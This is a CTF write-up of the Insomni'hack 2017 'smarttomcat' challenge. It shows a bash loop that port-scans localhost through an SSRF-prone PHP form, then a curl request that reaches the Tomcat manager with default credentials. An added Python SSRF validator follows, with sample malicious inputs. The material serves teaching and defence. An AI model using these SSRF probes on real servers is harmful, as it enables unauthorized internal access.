The Insomni’hack teaser 2017 was a fun CTF with a good spread between easy and hard challenges.
The smarttomcat challenge was an easy web challenge about attacking a badly secured Tomcat server. As a user you were presented with a webpage backed by a PHP backend, and that backend called a Tomcat server on localhost.
When looking at the form POST data from the browser it became apparent that the URL the backend called was submitted by the form itself.
This enabled us to write a port scan as a simple bash loop:
# Probe each localhost port through the backend; the port number and the
# backend's response for that port are appended together to /tmp/log.
for x in $(seq 1 65535); do
    echo "$x" >> /tmp/log
    curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' \
        --data "u=http%3A%2F%2Flocalhost%3A${x}%2F" >> /tmp/log
done
This didn’t really help us, but we realized that we could reach the Tomcat manager URL on the same port as the rest of the application. A quick Google search gave us the default username and password.
curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data 'u=http://tomcat:email@example.com:8080/manager/html'
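The two requests above work because the backend fetches whatever URL the form hands it: first a loop over localhost ports, then a URL carrying credentials straight to the manager application. The following is an added example, not code from the writeup or the challenge, of the input check such a "fetch this URL" backend is missing. It is written in Python rather than the challenge's PHP; the allowed schemes and ports (only public http/https on 80 and 443) and the field name `u` are assumptions taken from the form data shown above, and the sample inputs are constructed.

```python
"""SSRF guard for a backend that fetches a user-supplied URL (added example).

Rejects loopback, private, link-local and unspecified addresses, embedded
credentials in the URL, and any port other than the public web ports, so
neither the port-scan loop nor the manager request would be forwarded.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}   # assumption: the backend only needs public web ports
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def is_internal_host(host: str) -> bool:
    """True for names or address literals that must never be fetched for a user."""
    if host.lower().rstrip(".") in LOCAL_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. This only inspects the literal host; a deployment
        # must also resolve the name and apply the same test to every resolved
        # address, otherwise a name that resolves to 127.0.0.1 slips through.
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_target(url: str):
    """Return (allowed, reason) for a URL the backend has been asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    # user:password@host is the form used to hit the manager application.
    if parts.username is not None or parts.password is not None:
        return False, "credentials in url"
    host = parts.hostname          # already lower-cased, brackets stripped for IPv6
    if not host:
        return False, "no host"
    if is_internal_host(host):
        return False, "internal address"
    try:
        port = parts.port           # raises ValueError for out-of-range ports
    except ValueError:
        return False, "port not allowed"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    return True, "ok"


def validate_form_body(body: str):
    """Apply validate_target to the 'u' field of an x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("u", [])
    if len(values) != 1:
        return False, "expected exactly one u field"
    return validate_target(values[0])


if __name__ == "__main__":
    # Constructed sample inputs: the shape of the two requests from the writeup,
    # plus a few other cases such a check has to handle.
    samples = [
        "u=http%3A%2F%2Flocalhost%3A8080%2Fmanager%2Fhtml",
        "u=http://tomcat:PASSWORD_PLACEHOLDER@127.0.0.1:8080/manager/html",
        "u=http%3A%2F%2F%5B%3A%3A1%5D%3A8080%2F",
        "u=http://169.254.169.254/latest/meta-data/",
        "u=http://example.com:8080/",
        "u=https://example.com/",
    ]
    for body in samples:
        allowed, reason = validate_form_body(body)
        print(f"{'ALLOW' if allowed else 'DENY ':5} {reason:<32} {body}")
```

The check is applied to the decoded form field, not the raw body, because the loop above sends the URL percent-encoded and the backend sees it decoded. The comment in `is_internal_host` is the important caveat: a hostname that passes the literal check can still resolve to an internal address, so the same test has to run on the resolved addresses before the connection is made.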